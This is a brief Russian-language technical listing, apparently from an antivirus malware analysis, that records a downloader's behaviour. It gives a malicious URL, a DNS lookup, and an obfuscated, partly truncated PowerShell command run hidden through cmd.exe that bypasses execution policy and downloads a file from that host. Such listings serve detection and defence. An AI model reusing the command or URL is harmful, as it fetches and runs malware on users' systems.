Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^W^E^r^shELL.eX^e ^-Ex^Ecu^TIonPoL^icY ^b^Yp^asS -N^opr^o^FIlE ^-w^I^NDoWSTyLE Hid^DE^n^ ^(nEW-oB^je^C^T SysTEm.nE^T.^wEbc^L^i^E^n^t).D^o^wNlo^aD^fI^LE('http://toagoores...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "Po^W^E^r^shELL.eX^e ^-Ex^Ecu^TIonPoL^icY ^b^Yp^asS -N^opr^o^FIlE ^-w^I^NDoWSTyLE Hid^DE^n^ ^(nEW-oB^je^C^T SysTEm.nE^T.^wEbc^L^i^E^n^t).D^o^wNlo^aD^fI^LE('http://toagoores...' (со скрытым окном)